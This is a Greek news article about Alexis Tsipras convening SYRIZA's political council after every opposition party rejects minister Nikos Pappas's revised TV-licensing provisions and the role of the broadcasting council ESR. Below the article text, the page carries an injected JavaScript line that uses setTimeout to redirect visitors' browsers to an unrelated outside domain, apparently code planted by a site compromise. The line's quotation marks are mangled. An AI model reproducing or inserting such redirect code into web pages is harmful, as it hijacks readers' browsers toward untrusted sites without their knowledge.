Συναγερμός στον Σύριζα -Ο Τσίπρας συγκαλεί το πολιτικό συμβούλιο

0
13

Συναγερμό στην ηγεσία του Σύριζα έχει προκαλέσει η καθολική απόρριψη από την αντιπολίτευση των νέων ρυθμίσεων για τις τηλεοπτικές άδειες, που κατέθεσε στη Βουλή ο υπουργός Επικρατείας Νίκος Παππάς. Παρά τη συνδρομή του προέδρου της Βουλής στην κυβερνητική επιχειρηματολογία, κανένα κόμμα της αντιπολίτευσης δεν τοποθετήθηκε θετικά απέναντι στις νέες διατάξεις, οι οποίες «αναστέλλουν» (δεν «καταργούν») τα αντισυνταγματικά άρθρα και αφήνουν στον υπουργό την αρμοδιότητα να αποφασίσει τον αριθμό των αδειών με τη «σύμφωνη γνώμη» του ΕΣΡ.

Ο πρωθυπουργός, μπροστά στο διαφαινόμενο αδιέξοδο, συγκαλεί εκτάκτως σε λίγη ώρα  το νέο πολιτικό συμβούλιο του Σύριζα, για να διαμορφωθεί νέα πολιτική γραμμή. Διευρύνει, έτσι, τον κύκλο των πολιτικών στελεχών που θα λάβουν την τελική απόφαση, μετά και την αυστηρή εσωκομματική κριτική που άσκησε η «Κίνηση των 53»  (με επικεφαλής τον Ευκλείδη Τσακαλώτο) στην επιλογή του Βύρωνα Πολύδωρα για την προεδρία του ΕΣΡ.

Η ΝΔ ζητάει την αντικατάσταση όλων των επίμαχων άρθρων, όπως και η Ένωση Κεντρώων, το Ποτάμι την αφαίρεση της αρμοδιότητας του υπουργού επί του αριθμού των αδειών και το ΠΑΣΟΚ την αντικατάσταση της λέξης «αναστέλλεται» με τη λέξη «καταργείται«.

Λίγο νωρίτερα ανώνυμη κυβερνητικη πηγή δήλωνε στο Αθηναϊκό Πρακτορείο Ειδήσεων ότι τόσο το Νομικό Συμβούλιο του Κράτους όσο και το Συμβούλιο Επικρατείας, με «ξεκάθαρες τοποθετήσεις», είχαν κρίνει ότι η προηγούμενη σύνθεση του ΕΣΡ ήταν μη νόμιμη. Και, συνεπώς, «σε περίπτωση που προχωρούσε η αδειοδότηση με την προηγούμενη, παράνομη σύνθεση του ΕΣΡ, οι άδειες θα ήταν αδύνατο να σταθούν έστω και μία μέρα στα δικαστήρια»

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here